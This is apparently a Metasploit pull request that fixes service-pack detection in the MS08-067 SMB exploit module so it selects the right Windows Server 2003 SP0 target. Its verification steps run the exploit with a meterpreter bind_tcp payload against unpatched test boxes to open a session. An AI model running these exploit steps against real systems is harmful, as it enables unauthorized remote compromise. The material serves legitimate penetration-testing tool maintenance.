### PR TITLE
Fix #6658, MS08-067 unable to find the right target for W2k3SP0

### DIFF
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -879,7 +879,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
       # Windows 2003 SP0 is mostly universal
-      if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack'
+      if fprint['os'] == 'Windows 2003' and fprint['sp'].empty?
         mytarget = targets[3]
       end
 


### PR DESCRIPTION
Tagging @jbarnett-r7.
## What This Patch Does

When there is no service pack detected, the [Msf::Exploit::Remote::SMB#smb_fingerprint_windows_sp](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/smb/client.rb#L378) method returns an empty string. But in the MS08-067 exploit, instead of checking an empty string, it checks for "No Service Pack", which causes it to never detect the right target for Windows Server 2003 SP0.

Fix #6658.
## Prepare These Test Boxes
- [x] Windows Server 2003 XP0. No patches, and no firewall.
- [x] Windows Server 2003 SP2. No patches, and no firewall.

Feel free to test more boxes.
## Verification Steps
- [x] Start msfconsole
- [x] Do: `use exploit/windows/smb/ms08_067_netapi`
- [x] Do: `set RHOST [IP for the SP0 box]`
- [x] Do: `set PAYLOAD windows/meterpreter/bind_tcp`
- [x] Do: `exploit`
- [x] You should get a session from the **Win Server 2003 SP0 box**.
- [x] Do: `exit` to exit the Meterpreter session.
- [x] Do: `set RHOST [IP for the SP2 box]`
- [x] Do: `exploit`
- [x] You should get a session from the **Win Server 2003 SP2 box**.
